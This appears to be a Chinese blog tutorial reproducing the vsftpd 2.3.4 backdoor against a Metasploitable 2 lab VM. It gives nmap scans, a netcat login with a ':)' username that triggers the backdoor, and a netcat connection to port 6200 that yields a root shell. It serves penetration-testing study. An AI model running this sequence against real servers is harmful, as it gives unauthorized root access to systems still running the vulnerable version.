笑脸漏洞(VSFTP2.3.4)复现
目录
一、Ftp笑脸漏洞原理
二、环境搭建
三、漏洞复现
一、Ftp笑脸漏洞原理
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
二、环境搭建
攻击机:kali-linux-2022.2(IP:192.168.50.133/24)
靶机:metasploitable-linux-2.0.0(IP:192.168.50.190/24)
靶机metasploitable-linux-2.0.0下载地址:https://pan.baidu.com/s/1cB2yKSEZvU9ajU4IeU8pCw
提取码:8888
1、metasploitable-linux-2.0.0下载完成后解压到电脑,然后使用VMware直接打开
2、使用普通用户msfadmin ,密码msfadmin 进行登录,修改root密码
msfadmin@metasploitable:~$ sudo passwd root
三、漏洞复现
1、开启metasploitable-linux-2.0.0虚拟机,在kali上打开一个终端,使用kali的nmap对靶机进行端口扫描,发现靶机开放了21 ftp端口
nmap 192.168.50.190
2、使用nmap扫描FTP服务的版本信息
nmap -sV 192.168.50.190
3、利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入,注意:这里需要手动输入,此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会随之关闭
例如:user a:) pass 111111
nc 192.168.50.190 21
4、在kali上另起一个终端, 用nmap扫描端口6200,观察端口打开情况
nmap -p 6200 192.168.50.190
5、用nc连接6200端口,成功以root身份登入,漏洞复现完毕
netcat 192.168.50.190 6200
笑脸漏洞(VSFTP2.3.4)复现相关推荐
- python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 一.漏洞介绍 vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 ...
- [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...
- NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决
NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020 ...
- vsftpd2.3.4笑脸漏洞
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞.虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本.这个后门的载荷以 :)字符的形式拼接在用户名 ...
- 实现笑脸漏洞vsftpd2.3.4
靶机metasploitable 默认登录账号和密码都是:msfadmin 登录后查看靶机IP:192.168.80.130 打开kali首先输入sudo su ,输入当前用户密码即可切换root,利 ...
- wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为 ...
- Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现“没”成功
Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现没成功 参考链接 https://github.com/chvancooten/follina.py http ...
- 【vulhub】Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)复现与反思!
特征 1.8090端口 2.confluence图标(如图所示) 搭建环境 搭建confluence看这4篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluen ...
最新文章
- SDUT_2118 数据结构实验之链表三:链表的逆置
- Mongodb 与sql 语句对照
- mysql8.0.20安装教程linux_Linux下安装mysql-8.0.20的教程详解
- 忠言多少有些逆耳,创业的九条真经
- 了解SQL Server中的GUID数据类型
- 敏捷开发用户故事系列之八:验收标准
- Gitlab+Git实现版本控制系统
- LabView学习笔记(八):属性节点
- MYSQL SHOW VARIABLES简介
- kettle实现颗粒度转换
- 会计实务综合模拟计算机实训心得,模拟企业会计实训心得体会
- 《STL源码分析》学习笔记 — STL概论与版本简介
- 怎么讲计算机屏幕录制,电脑如何录制屏幕
- [Echarts][全网唯一]X轴axisLabel随文字长度自动旋转的实现思路
- 针对ESXI5.5 本地磁盘分区丢失的解决方法,
- OSChina 周二乱弹 ——室友开始买假发女装了
- 【论文阅读】Rotom: A Meta-Learned Data Augmentation Framework for Entity Matching
- 华为高管丁耘跑28公里后突发疾病去世:在公司工作26年
- 一封来自大佬的密信待查收
- 声音文件大小的计算方法
热门文章
- Charles4.0最新版破解
- [pwn]gdb-peda调试
- PowerPoint2003上嵌入Excel Sheet
- Visual C++ 6.0 操作PowerPoint 2003
- 那些整天脸上都挂着笑容的人,你真的了解他们吗
- 万众期待: iebook超级精灵2008电子杂志制作套件全球发布
- Unity_Shader高级篇_14_Unity Shader入门精要
- PCQQ ECDH算法C++实现
- 【vue开发基础】之Vue实现导入导出文件功能(基于饿了么UI)(二)
- 如何开发辅助决策系统?